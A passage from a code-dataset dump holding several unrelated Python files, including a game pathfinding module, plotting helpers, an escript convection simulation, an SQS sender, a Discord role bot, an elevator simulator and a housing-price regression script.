there is a city at the end that I can capture\n capture_paths = [\n path for path in swamp_paths\n if (path[-1].is_city or path[-1].tile == TILE_EMPTY) and\n not path[-1].is_on_team() and\n path[-1].army < self.army - len(path) - 1\n ]\n if capture_paths:\n shortest_path = min(capture_paths, key=len)\n return shortest_path\n # there is something new to see at the end, go for that\n explore_paths = [\n path for path in swamp_paths\n if path[-1].tile in [TILE_FOG, TILE_OBSTACLE] and not path[-1].is_mountain\n and len(path) < self.army - 1\n ]\n if explore_paths:\n shortest_path = min(explore_paths, key=len)\n return shortest_path\n\n # otherwise follow any of the other paths\n shortest_path = min(swamp_paths, key=len)\n return shortest_path\n\n def step_toward_me(self):\n largest_tile = self._map.find_largest_tile()\n bfs_queue: deque[Tile] = deque([self])\n processed = set()\n go_next = {self:None}\n opposing_strength = {self:self.army}\n\n while bfs_queue:\n current = bfs_queue.popleft()\n if current == largest_tile:\n return False, False\n if current in processed:\n continue\n for neighbor in current.neighbors(True, True, True):\n if neighbor not in processed:\n if neighbor not in go_next:\n bfs_queue.append(neighbor)\n if neighbor.is_on_team():\n next_opposing_strength = opposing_strength[current] - (neighbor.army + 1)\n else:\n next_opposing_strength = opposing_strength[current] + (neighbor.army + 1) * 1.1\n if neighbor.is_swamp:\n next_opposing_strength += 1\n if neighbor not in opposing_strength or next_opposing_strength < opposing_strength[neighbor]:\n opposing_strength[neighbor] = next_opposing_strength\n go_next[neighbor] = current\n if next_opposing_strength < 0 and neighbor.is_self():\n return neighbor, current\n processed.add(current)\n\n return False, False\n\n # ======================== PRIVATE FUNCTIONS ======================== #\n\n def _set_neighbors(self):\n x = self.x\n y = self.y\n\n neighbors = []\n for dy, dx in DIRECTIONS:\n if self._map.is_valid_position(x + dx, y + dy):\n tile = self._map.grid[y + dy][x + dx]\n neighbors.append(tile)\n\n self._neighbors = neighbors\n return neighbors\n\n # ========================== PROPERTIES ============================ #\n\ndef _path_reconstruct(came_from, dest):\n current = dest\n path = [current]\n try:\n while came_from[current] is not None:\n current = came_from[current]\n path.append(current)\n except KeyError:\n pass\n path.reverse()\n\n return path\n","sub_path":"base/client/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":16986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"231121517","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef visualize_loss(train_loss_1, test_loss_1, init_name_1, train_loss_2, test_loss_2, init_name_2):\n x_axis = list(range(1, len(train_loss_1)+1))\n\n fig, ax = plt.subplots()\n ax.plot(x_axis, train_loss_1, color=(1.0, 0.0, 0.0))\n ax.plot(x_axis, train_loss_2, color=(0.0, 1.0, 0.0))\n ax.plot(x_axis, test_loss_1, color=(0.0, 0.0, 1.0))\n ax.plot(x_axis, test_loss_2, color=(0.33, 0.33, 0.33))\n ax.set(xlabel='epochs', ylabel='loss',\n title=\"Compare Init Methods Loss\")\n ax.grid()\n plt.legend([init_name_1 + \" - train_loss\", init_name_2 + \" - train_loss\", init_name_1 + \" - test_loss\", init_name_2 + \" - test_loss\"])\n\n fig.savefig(\"statistics/results/initialization/loss.png\")\n plt.close(fig)\n\ndef visualize_acc(train_acc_1, test_acc_1, init_name_1, train_acc_2, test_acc_2, init_name_2):\n x_axis = list(range(1, len(train_acc_1)+1))\n\n fig, ax = plt.subplots()\n ax.plot(x_axis, train_acc_1, color=(1.0, 0.0, 0.0))\n ax.plot(x_axis, train_acc_2, color=(0.0, 1.0, 0.0))\n ax.plot(x_axis, test_acc_1, color=(0.0, 0.0, 1.0))\n ax.plot(x_axis, test_acc_2, color=(0.33, 0.33, 0.33))\n ax.set(xlabel='epochs', ylabel='acc',\n title=\"Compare Init Methods Accuracy\")\n ax.grid()\n plt.legend([init_name_1 + \" - train_acc\", init_name_2 + \" - train_acc\", init_name_1 + \" - test_acc\", init_name_2 + \" - test_acc\"])\n\n fig.savefig(\"statistics/results/initialization/acc.png\")\n plt.close(fig)\n\nif __name__ == \"__main__\":\n normal_stats = np.load(\"statistics/results/initialization/results/random_init_stats.npy\", allow_pickle=True)\n xavier_stats = np.load(\"statistics/results/initialization/results/xavier_init_stats.npy\", allow_pickle=True)\n\n normal_train_loss, normal_test_loss, normal_train_acc, normal_test_acc = normal_stats\n xavier_train_loss, xavier_test_loss, xavier_train_acc, xavier_test_acc = xavier_stats\n\n visualize_loss(normal_train_loss, normal_test_loss, \"Normal\", xavier_train_loss, xavier_test_loss, \"Xavier\")\n visualize_acc(normal_train_acc, normal_test_acc, \"Normal\", xavier_train_acc, xavier_test_acc, \"Xavier\")\n\n","sub_path":"EX1/Q3/statistics/visualize_initialization_statistics.py","file_name":"visualize_initialization_statistics.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"196270614","text":"import pygame\n\ndef init():\n pygame.init()\n basicset = pygame.display.set_mode((400, 400))\n\ndef keyPressed(keyName):\n feedback = False\n for eve in pygame.event.get(): pass\n keyInput = pygame.key.get_pressed()\n myKey = getattr(pygame, 'K_{}'.format(keyName))\n if keyInput[myKey]:\n feedback = True\n pygame.display.update()\n return feedback\n\ndef main():\n if keyPressed(\"h\"):\n print(\"statusOK\")\n\nif __name__ == '__main__':\n init()\n while True:\n main()","sub_path":"PYTHON-DRONE/KeyBoardsetting.py","file_name":"KeyBoardsetting.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"461114948","text":"# 61\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef rotateRight(head, k):\n if not head:\n return None\n if not head.next:\n return head\n # 将链表连成环\n tail = head\n n = 1\n while tail.next:\n tail = tail.next\n n += 1\n tail.next = head\n\n # 找到新的表头表尾并断开链表\n new_tail = head\n for _ in range(n - k % n - 1):\n new_tail = new_tail.next\n new_head = new_tail.next\n new_tail.next = None\n return new_head \n\n\nhead = ListNode(1)\nhead.next = h2 = ListNode(2)\nh2.next = h3 = ListNode(3)\nh3.next = h4 = ListNode(4)\nh4.next = h5 = ListNode(5)\n\n\ntemp = rotateRight(head, 7)\nfor i in range(5):\n print(temp.val)\n temp = temp.next\n\n","sub_path":"algorithm/leetcode/链表类型题/旋转链表.py","file_name":"旋转链表.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"527489833","text":"##############################################################################\n#\n# Copyright (c) 2003-2018 by The University of Queensland\n# http://www.uq.edu.au\n#\n# Primary Business: Queensland, Australia\n# Licensed under the Apache License, version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Development until 2012 by Earth Systems Science Computational Center (ESSCC)\n# Development 2012-2013 by School of Earth Sciences\n# Development from 2014 by Centre for Geoscience Computing (GeoComp)\n#\n##############################################################################\n\"\"\"\nthis is a convection simulation over a domain [0,L] X [0,L] x [0,H]\n\nIt is solved in dimensionless form\n\n\"\"\"\n\nfrom __future__ import print_function, division\n\n__copyright__=\"\"\"Copyright (c) 2003-2018 by The University of Queensland\nhttp://www.uq.edu.au\nPrimary Business: Queensland, Australia\"\"\"\n__license__=\"\"\"Licensed under the Apache License, version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\"\"\"\n__url__=\"https://launchpad.net/escript-finley\"\n\nfrom esys.escript import *\nfrom esys.escript import DataManager as DM\nfrom esys.escript.models import TemperatureCartesian, IncompressibleIsotropicFlowCartesian, Mountains, SubSteppingException\nfrom esys.finley import Rectangle, Brick, LoadMesh\nfrom optparse import OptionParser\nfrom math import pi, ceil\nimport sys\nimport time\n\n# ============================= Default Values ===============================\n\nDIM=2 # spatial dimension\nH=1. # height\nL=2*H # length\nNE=30 # number of elements in H-direction\nPERT=0.15 # initial temperature perturbation\nDT=1.e-4 # initial time step size\nCREATE_TOPO=False # create topography\nDT_MIN=1.e-10 # minimum time step size\nT_END=10. # end time\n\nRHO_0=100. # surface density (lf ~ RHO_0**2) \nG=1. # gravitational constant\nALPHA_0=0.1 # thermal expansion coefficient (Ra ~ RHO_0**2 * ALPHA_0 = lf * ALPHA_0)\nT_0=0. # surface temperature\nT_1=1. # bottom temperature\nC_P=1 # heat capacity\nK=1. # thermal conductivity\nCHI=0. # Taylor-Quinny coefficient\nMUE=None # elastic shear modulus\nTAU_Y=5*10**(2.5) # Drucker-Prager cohesion factor\nBETA=0 # Drucker-Prager friction factor\nTAU_0=2*10**(2.5) # transition stress\nN=3 # power for power law\n\nE=23*0 # activation energy\nV=18*0 # activation volume \nT_OFFSET=1 # temperature offset on surface (dimensionless formulation T_OFFSET=1 otherwise =0)\nR=1 # gas constant\nETA_N0=1. # viscosity at surface \n\nTOPO_SMOOTH=1e-5 # smoothing factor for extrapolation of surface velocity to interior\nT_TOL=1.e-4 # tolerance temperature transport\nFLOW_TOL=1.e-3 # tolerance for inconcompressible flow solver\nTOPO_TOL=0.1 # tolerance for update of topography\nDIAGNOSTICS_FN=\"diag.csv\" # filename for diagnostics\nVERBOSE=False # output more messages from solvers\nDT_VIS=T_END/500 # time difference between visualization files\nDN_VIS=5 # max. number of steps between visualization files\nDN_RESTART=1000 # create restart files every DN_RESTART steps\nPREFIX_RESTART=\"restart\" # name prefix for restart directories\nTOPO_ITER_MAX=20 # max. number of iteration steps to update topography\n\n# ============================================================================\n\n#\n# read options:\n#\nparser = OptionParser(usage=\"%prog [Options]\")\nparser.add_option(\"-r\", \"--restart\", dest=\"restart\",\n help=\"restart from latest checkpoint directory. It will be deleted after new data is exported.\", default=False, action=\"store_true\")\nparser.add_option(\"-d\", \"--dir\", dest=\"restart_dir\",\n help=\"locate/create restart directories under DIR.\", metavar=\"DIR\", default='.')\nparser.add_option(\"-p\", \"--param\", dest=\"param\",\n help=\"name of file to be imported \", metavar=\"PARAM\", default=None)\n(options, args) = parser.parse_args()\nrestart=options.restart\n\n#\n# overwrite the default options:\n#\nprint((\"<%s> Execution started.\"%time.asctime()))\nif options.param !=None: \n exec(open(options.param,'r'))\n print((\"Parameters imported from file \",options.param))\n\nprint(\"Input Parameters:\")\nprint((\"\\tDimension DIM\\t\\t= %d\"%DIM))\nprint((\"\\tHeight H\\t\\t\\t= %s\"%H))\nprint((\"\\tLength L\\t\\t\\t= %s\"%L))\nprint((\"\\tElements in H NE\\t\\t= %d\"%NE))\nprint((\"\\tTemperature perturbation PERT\\t\\t= %s\"%PERT))\nprint((\"\\tInitial time step size DT\\t\\t= %s\"%DT))\nprint((\"\\tMinimum time step size DT_MIN\\t\\t= %s\"%DT_MIN))\nprint((\"\\tEnd time T_END\\t\\t= %s\"%T_END))\nprint((\"\\tCreate topography CREATE_TOPO\\t= %s\"%CREATE_TOPO))\nprint((\"\\tSurface density RHO_0\\t\\t= %s\"%RHO_0))\nprint((\"\\tGravitational constant G\\t\\t\\t= %s\"%G))\nprint((\"\\tThermal expansion coefficient ALPHA_0\\t\\t= %s\"%ALPHA_0))\nprint((\"\\tSurface temperature T_0\\t\\t= %s\"%T_0))\nprint((\"\\tBottom temperature T_1\\t\\t= %s\"%T_1))\nprint((\"\\tHeat capacity C_P\\t\\t= %s\"%C_P))\nprint((\"\\tThermal conductivity K\\t\\t\\t= %s\"%K))\nprint((\"\\tTaylor-Quinny coefficient CHI\\t\\t= %s\"%CHI))\nprint((\"\\tElastic shear modulus MUE\\t\\t= %s\"%MUE))\nprint((\"\\tCohesion factor TAU_Y\\t\\t= %s\"%TAU_Y))\nprint((\"\\tFriction factor BETA\\t\\t= %s\"%BETA))\nprint((\"\\tTransition stress TAU_0\\t\\t= %s\"%TAU_0))\nprint((\"\\tPower for power law N\\t\\t\\t= %s\"%N))\nprint((\"\\tViscosity at surface ETA_N0\\t\\t= %s\"%ETA_N0))\nprint((\"\\tActivation energy E\\t\\t\\t= %s\"%E))\nprint((\"\\tActivation volume V\\t\\t\\t= %s\"%V))\nprint((\"\\tTemperature offset T_OFFSET\\t\\t= %s\"%T_OFFSET))\nprint((\"\\tGas constant R\\t\\t\\t= %s\"%R))\nprint((\"\\tTopography smoothing TOPO_SMOOTH\\t= %s\"%TOPO_SMOOTH))\nprint((\"\\tTolerance for topography TOPO_TOL\\t\\t= %s\"%TOPO_TOL))\nprint((\"\\tTransport tolerance T_TOL\\t\\t= %s\"%T_TOL))\nprint((\"\\tFlow tolerance FLOW_TOL\\t\\t= %s\"%FLOW_TOL))\n#print(\"\\tFile for diagnostics DIAGNOSTICS_FN\\t= %s\"%DIAGNOSTICS_FN)\nprint((\"\\tRestart counter increment DN_RESTART\\t= %d\"%DN_RESTART))\nprint((\"\\tPrefix for restart dirs PREFIX_RESTART\\t= %s\"%PREFIX_RESTART))\nprint((\"\\tVerbosity VERBOSE\\t\\t= %s\"%VERBOSE))\n\nprint(\"Control Parameters:\")\nt_REF=RHO_0*C_P*H**2/K\nP_REF=ETA_N0/t_REF\nAr=E/R/(T_1-T_0)\nif E>0 and V>0:\n V_REF=P_REF*V/E\nelse:\n V_REF=0\nT_OFFSET_REF=T_OFFSET/(T_1-T_0)\nRa=RHO_0*G*H*(T_1-T_0)*ALPHA_0/P_REF\nDi=ALPHA_0*G*H/C_P\nCHI_REF=CHI*K*ETA_N0/(RHO_0**2*C_P**2*(T_1-T_0)*H**2)\nif CREATE_TOPO:\n SURFACE_LOAD=RHO_0*G*H/P_REF\nelse:\n SURFACE_LOAD=0.\nif MUE == None:\n De=None\nelse:\n De=ETA_N0/MUE/t_REF\nETA_BOT=exp(Ar*((1.+V_REF)/(T_OFFSET_REF+1)-1./T_OFFSET_REF))*ETA_N0\nprint((\"\\tTotal #elements \\t\\t\\t= %d\"%(NE**DIM*int(L/H)**(DIM-1))))\nprint((\"\\tReference time t_REF\\t\\t= %s\"%t_REF))\nprint((\"\\tReference pressure P_REF\\t\\t= %s\"%P_REF))\nprint((\"\\tReference Taylor-Quinny CHI_REF\\t\\t= %s\"%CHI_REF))\nprint((\"\\tDissipation number DI\\t\\t= %s\"%Di))\nprint((\"\\tRayleigh number surface Ra\\t\\t= %s\"%Ra))\nprint((\"\\tDebora number surface De\\t\\t= %s\"%De))\nprint((\"\\tBottom viscosity \\t\\t\\t= %s\"%ETA_BOT))\nprint((\"\\tRayleigh number bottom \\t\\t\\t= %s\"%(RHO_0*G*H*(T_1-T_0)*ALPHA_0*t_REF/ETA_BOT)))\nif MUE == None:\n print(\"\\tDebora number bottom \\t\\t\\t= None\")\nelse:\n print((\"\\tDebora number bottom \\t\\t\\t= %s\"%(ETA_BOT/MUE/t_REF)))\nprint((\"\\tArrhenius Ar\\t\\t= %s\"%Ar))\nprint((\"\\tSurface load factor SURFACE_LOAD\\t= %s\"%SURFACE_LOAD))\nprint((\"\\tScaled activation volume V_REF\\t\\t= %s\"%V_REF))\nprint()\n\n# some control variables (will be overwritten in case of a restart:\nt=0 # time stamp\nn=0 # time step counter\nt_vis=DT_VIS # time of next visualization file export\ndt=DT # current time step size\n#=========================\n#\n# set up domain and data from scratch or from restart files\n#\ndataMgr=DM(formats=[DM.RESTART,DM.VTK], work_dir=options.restart_dir, restart_prefix=PREFIX_RESTART, do_restart=restart)\ndataMgr.setCheckpointFrequency(DN_RESTART/DN_VIS)\nif dataMgr.hasData():\n dom=dataMgr.getDomain()\n t=dataMgr.getValue('t')\n t_vis=dataMgr.getValue('t_vis')\n n=dataMgr.getValue('n')\n dt=dataMgr.getValue('dt')\n stress=dataMgr.getValue('stress')\n v=dataMgr.getValue('v')\n p=dataMgr.getValue('p')\n T=dataMgr.getValue('T')\n if CREATE_TOPO:\n topography=dataMgr.getValue('topography')\n \n #diagnostics_file=FileWriter(DIAGNOSTICS_FN,append=True)\n print((\"<%s> Restart at time step %d (t=%e) completed.\"%(time.asctime(),n,t)))\nelse:\n if DIM==2:\n dom=Rectangle(int(ceil(L*NE/H)),NE,l0=L/H,l1=1,order=-1,optimize=True)\n else:\n dom=Brick(int(ceil(L*NE/H)),int(ceil(L*NE/H)),NE,l0=L/H,l1=L/H,l2=1,order=-1,optimize=True)\n x=dom.getX()\n T=Scalar(1,Solution(dom))\n for d in range(DIM):\n if d == DIM-1: \n T*=sin(x[d]/H*pi)\n else:\n T*=cos(x[d]/L*pi)\n\n T=(1.-x[DIM-1])+PERT*T\n v=Vector(0,Solution(dom))\n stress=Tensor(0,Function(dom))\n x2=ReducedSolution(dom).getX()\n p=Ra*(x2[DIM-1]-0.5*x2[DIM-1]**2-0.5)\n\n if CREATE_TOPO:\n topography=Scalar(0.,Solution(dom))\n #diagnostics_file=FileWriter(DIAGNOSTICS_FN,append=False)\n #diagnostics_file.write(\"Ra = %e Lambda= %e\\n\"%(Ra, SURFACE_LOAD))\n\np_last=p\nx=dom.getX()\n#\n# set up heat problem:\n#\nheat=TemperatureCartesian(dom)\nprint((\"<%s> Temperature transport has been set up.\"%time.asctime()))\nheat.getSolverOptions().setTolerance(T_TOL)\nheat.getSolverOptions().setVerbosity(VERBOSE)\nfixed_T_at=whereZero(x[DIM-1])+whereZero(H-x[DIM-1])\nheat.setInitialTemperature(clip(T,T_0))\nheat.setValue(rhocp=1,k=1,given_T_mask=fixed_T_at)\n#\n# velocity constraints:\n#\nfixed_v_mask=Vector(0,Solution(dom))\nfaces=Scalar(0.,Solution(dom))\nfor d in range(DIM):\n if d == DIM-1: \n ll = H\n else:\n ll = L\n if CREATE_TOPO and d==DIM-1:\n fixed_v_mask+=whereZero(x[d])*unitVector(d,DIM)\n else:\n s=whereZero(x[d])+whereZero(x[d]-ll)\n faces+=s\n fixed_v_mask+=s*unitVector(d,DIM)\n#\n# set up velocity problem\n#\nflow=IncompressibleIsotropicFlowCartesian(dom, stress=stress, v=v, p=p, t=t, numMaterials=2, verbose=VERBOSE)\nflow.setDruckerPragerLaw(tau_Y=TAU_Y/P_REF+BETA*(1.-Function(dom).getX()[DIM-1]))\n\nflow.setElasticShearModulus(MUE)\nflow.setTolerance(FLOW_TOL)\nflow.setEtaTolerance(FLOW_TOL)\nflow.setExternals(fixed_v_mask=fixed_v_mask)\nprint((\"<%s> Flow solver has been set up.\"%time.asctime()))\n#\n# topography setup\n#\nboundary=FunctionOnBoundary(dom).getX()[DIM-1]\ntop_boundary_mask=whereZero(boundary-sup(boundary))\nsurface_area=integrate(top_boundary_mask)\nif CREATE_TOPO:\n mts=Mountains(dom,eps=TOPO_SMOOTH)\n mts.setTopography(topography)\n print((\"<%s> topography has been set up.\"%time.asctime()))\n\n#\n# let the show begin:\n#\nt1 = time.time()\nprint((\"<%s> Start time step %d (t=%s).\"%(time.asctime(),n,t)))\nwhile t TOPO_TOL * Topo_norm:\n flow.setStatus(t, v_old, p_old, stress_old)\n flow.setExternals(f=-SURFACE_LOAD*(topography-dt*v)*unitVector(DIM-1,DIM)*top_boundary_mask, restoration_factor=SURFACE_LOAD*dt*top_boundary_mask) \n flow.update(dt, iter_max=100, verbose=False)\n v=flow.getVelocity()\n mts.setTopography(topography_old)\n mts.setVelocity(v)\n topography_last, topography=topography, mts.update(dt, allow_substeps=True)\n error_Topo=sqrt(integrate(((topography-topography_last)*top_boundary_mask)**2))\n Topo_norm=sqrt(integrate((topography*top_boundary_mask)**2))\n #print(\"topography update step %d error = %e, norm = %e.\"%(i, error_Topo, Topo_norm), Lsup(v))\n i+=1\n if i > TOPO_ITER_MAX: \n raise RuntimeError(\"topography did not converge after %d steps.\"%TOPO_ITER_MAX)\n v=flow.getVelocity()\n #for d in range(DIM):\n #print(\"range %d-velocity \"%d,inf(v[d]),sup(v[d]))\n #print(\"Courant = \",inf(dom.getSize()/(length(v)+1e-19)), inf(dom.getSize()**2))\n print(\"<%s> flow solver completed.\"%time.asctime())\n n+=1\n t+=dt\n #print(\"influx= \",integrate(inner(v,dom.getNormal())), sqrt(integrate(length(v)**2,FunctionOnBoundary(dom))), integrate(1., FunctionOnBoundary(dom)))\n print(\"<%s> Time step %d (t=%e) completed.\"%(time.asctime(),n,t))\n\n #====================== setup temperature problem ========================\n heat.setValue(v=v,Q=CHI_REF*flow.getTau()**2/flow.getCurrentEtaEff())\n dt=heat.getSafeTimeStepSize()\n print(\"<%s> New time step size is %e\"%(time.asctime(),dt))\n #=========================== setup topography ============================\n if CREATE_TOPO:\n dt=min(mts.getSafeTimeStepSize()*0.5,dt)\n #print(\"<%s> New time step size is %e\"%(time.asctime(),dt))\n #print(\"<%s> Start time step %d (t=%e).\"%(time.asctime(),n+1,t+dt))\n #\n # solve temperature:\n #\n T=heat.getSolution(dt)\n print(\"Temperature range \",inf(T),sup(T))\n print(\"<%s> temperature update completed.\"%time.asctime())\n #============================== analysis =================================\n #\n # .... Nusselt number\n #\n dTdz=grad(T)[DIM-1]\n Nu=1.-integrate(v[DIM-1]*T)/integrate(dTdz)\n eta_bar=integrate(flow.getTau())/integrate(flow.getTau()/flow.getCurrentEtaEff())\n Ra_eff= (t_REF*RHO_0*G*H*(T_1-T_0)*ALPHA_0)/eta_bar\n #print(\"nusselt number = \",Nu)\n #print(\"avg. eta = \",eta_bar)\n #print(\"effective Rayleigh number = \",Ra_eff)\n if CREATE_TOPO:\n topo_level=integrate(topography*top_boundary_mask)/surface_area\n valleys_deep=inf(topography)\n mountains_heigh=sup(topography)\n #print(\"topography level = \",topo_level)\n #print(\"valleys deep = \",valleys_deep)\n #print(\"mountains_heigh = \",mountains_heigh)\n #diagnostics_file.write(\"%e %e %e %e %e %e %e\\n\"%(t,Nu, topo_level, valleys_deep, mountains_heigh, eta_bar, Ra_eff))\n #else:\n #diagnostics_file.write(\"%e %e %e %e\\n\"%(t,Nu, eta_bar, Ra_eff))\n # ========================================================================\n #\n # create restart/visualization files:\n #\n if t>=t_vis or n%DN_VIS==0:\n dataMgr.setTime(t)\n t_vis+=DT_VIS\n dataMgr.addData(t=t,n=n,t_vis=t_vis,dt=dt,T=T,v=v,eta=flow.getCurrentEtaEff(),stress=stress,p=p)\n if CREATE_TOPO: dataMgr.addData(topography=topography)\n dataMgr.export()\n print((\"<%s> Cycle %d (time %s) exported.\"%(time.asctime(),dataMgr.getCycle(),t)))\n\nprint((\"<%s> Calculation finalized after %s seconds.\"%(time.asctime(),time.time()-t1)))\n\n","sub_path":"finley/test/python/convection.py","file_name":"convection.py","file_ext":"py","file_size_in_byte":15987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"264545293","text":"import os\nimport sys\nimport pandas as pd\nimport numpy as np\n\n\nmaindirectory = \"G:/Behavioral Data/Sonntag Lab Dropbox/Phenotyper/Investigators/\" \ninvestigator = str(sys.argv[1])\ndirectory0 = maindirectory + investigator + \"/Data/Distance moved/\"\ntreatments = os.listdir(directory0)\nnumberofmice = 0\nfor j in treatments:\n\tos.chdir(directory0 + j)\n\tnumberofmice = numberofmice + int(len(os.listdir(directory0 + j)))\n\tos.chdir(directory0)\n\nprint(investigator + \" has run \" + str(numberofmice) + \" mice through the Phenotypers\")","sub_path":"investigatormouseinventory.py","file_name":"investigatormouseinventory.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584394454","text":"import argparse\nimport logging\nimport sys\nfrom time import sleep\n\nimport boto3\nimport Faker\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--queue-name\", \"-q\", required=True,\n help=\"SQS queue name\")\nparser.add_argument(\"--interval\", \"-i\", required=True,\n help=\"timer interval\", type=float)\nparser.add_argument(\"--message\", \"-m\", help=\"message to send\")\nparser.add_argument(\"--log\", \"-l\", default=\"INFO\",\n help=\"logging level\")\nargs = parser.parse_args()\n\nif args.log:\n logging.basicConfig(\n format='[%(levelname)s] %(message)s', level=args.log)\n\nelse:\n parser.print_help(sys.stderr)\n\nsqs = boto3.client('sqs')\n\nresponse = sqs.get_queue_url(QueueName=args.queue_name)\n\nqueue_url = response['QueueUrl']\n\nlogging.info(queue_url)\n\nwhile True:\n message = args.message\n if not args.message:\n fake = Faker()\n message = fake.text()\n\n logging.info('Sending message: ' + message)\n\n response = sqs.send_message(\n QueueUrl=queue_url, MessageBody=message)\n\n logging.info('MessageId: ' + response['MessageId'])\n sleep(args.interval)","sub_path":"SQS/send_message_sqs.py","file_name":"send_message_sqs.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272010112","text":"import discord\nimport os\n\n\nclient = discord.Client(command_prefix='/')\ntoken = os.environ['DISCORD_BOT_TOKEN']\n\nID_CHANNEL_README = 860865623471030324 # 該当のチャンネルのID\nID_ROLE_WELCOME = 860874687621758977 # 付けたい役職のID\n\n@client.event\nasync def on_raw_reaction_add(payload):\n # channel_id から Channel ���ブジェクトを取得\n channel = client.get_channel(payload.channel_id)\n\n # 該当のチャンネル以外はスルー\n if channel.id != ID_CHANNEL_README:\n return\n\n # guild_id から Guild オブジェクトを取得\n guild = client.get_guild(payload.guild_id)\n\n # user_id から Member オブジェクトを取得\n # member = guild.get_member(payload.user_id)\n\n # 用意した役職IDから Role オブジェクトを取得\n role = guild.get_role(ID_ROLE_WELCOME)\n\n # リアクションを付けたメンバーに役職を付与\n await payload.member.add_roles(role)\n\n # 分かりやすいように歓迎のメッセージを送る\n await channel.send('いらっしゃいませ!')\n\n@client.event\nasync def on_ready():\n print(\"Botは正常に起動しました!\")\n print(client.user.name) # ボットの名前\n print(client.user.id) # ボットのID\n print(discord.__version__) # discord.pyのバージョン\n print('------')\n await client.change_presence(activity=discord.Game(name=\"役職を管理!\"))\n\n\nclient.run(token)\n","sub_path":"discordbot.py","file_name":"discordbot.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"489907651","text":"import asyncio\nimport curses\n\nfrom curses_tools import discover_active_area\n\n\nasync def fire(canvas, start_row, start_column, rows_speed=-0.3, columns_speed=0):\n \"\"\"Display animation of gun shot. Direction and speed can be specified.\"\"\"\n\n row, column = start_row, start_column\n\n canvas.addstr(round(row), round(column), '*')\n await asyncio.sleep(0)\n\n canvas.addstr(round(row), round(column), 'O')\n await asyncio.sleep(0)\n canvas.addstr(round(row), round(column), ' ')\n\n row += rows_speed\n column += columns_speed\n\n symbol = '-' if columns_speed else '|'\n\n rows, columns = canvas.getmaxyx()\n max_row, max_column = rows - 1, columns - 1\n\n curses.beep()\n\n while 0 < row < max_row and 0 < column < max_column:\n canvas.addstr(round(row), round(column), symbol)\n await asyncio.sleep(0)\n canvas.addstr(round(row), round(column), ' ')\n row += rows_speed\n column += columns_speed\n\n\ndef prepare_fire_coroutine(canvas):\n active_area = discover_active_area(canvas)\n return fire(\n canvas=canvas,\n start_row=active_area['window_center_row'],\n start_column=active_area['window_center_column'],\n )\n","sub_path":"animations_code/fire_animation.py","file_name":"fire_animation.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"606430183","text":"class LiftSim(object):\n\n def __init__(self,queues, capacity):\n self.queues=queues\n self.capacity=capacity\n \n def theLift(self):\n queues=[list(i) for i in self.queues]\n target=[]\n path=[0]\n ground=0\n topFloor=len(queues) \n direction=1 # 1 is going UP and -1 is going DOWN\n people=0\n capac=self.capacity\n \n while queues.count([])!=len(queues) or len(target)!=0: #check if there's people queueing\n for i in range(ground, topFloor, direction):\n while i in target:\n people-=1\n if i!= path[-1]: #check if there's multiple people going to the same floor\n path.append(i)\n target.remove(i)\n if queues[i]:\n for j in queues[i][:]:\n if (j>i and direction+1) or (not direction+1 and j=capac:\n if i!=path[-1]:\n path.append(i)\n direction *=-1\n ground,topFloor=topFloor+direction,ground+direction #Lift changes direction\n if path[-1]!=0:\n return path+[0]\n else:\n return path\n","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"146474","text":"import pandas as pd\nimport numpy as np \nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import cross_val_score\n\n\nhousing = pd.read_csv(\"data.csv\")\n\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\nfor train_index, test_index in split.split(housing, housing['CHAS']):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n\nhousing = strat_train_set.drop(\"MEDV\", axis=1)\nhousing_labels = strat_train_set[\"MEDV\"].copy()\n\nmy_pipeline = Pipeline([\n ('imputer', SimpleImputer(strategy = \"median\")),\n ('std_scaler', StandardScaler()),\n\n])\n\nhousing_new = my_pipeline.fit_transform(housing) \n\nmodel = RandomForestRegressor()\nmodel.fit(housing_new, housing_labels)\n\nsome_data = housing.iloc[:5]\nsome_labels = housing_labels.iloc[:5]\nprepared_data = my_pipeline.transform(some_data)\n\n#print(model.predict(prepared_data))\n#print(list(some_labels))\n\nhousing_predictions = model.predict(housing_new)\nmse = mean_squared_error(housing_labels, housing_predictions)\nrmse = np.sqrt(mse)\n\nprint(rmse)\n\n\nscore = cross_val_score(model, housing_new, housing_labels, scoring = \"neg_mean_squared_error\", cv = 10)\nrmse_scores = np.sqrt(-score)\n\ndef print_scores(rmse_scores):\n print(\"Scores\", score, \"\\n\")\n print(\"mean\", score.mean(), \"\\n\")\n print(\"Standard Deviation\", score.std(), \"\\n\")\n 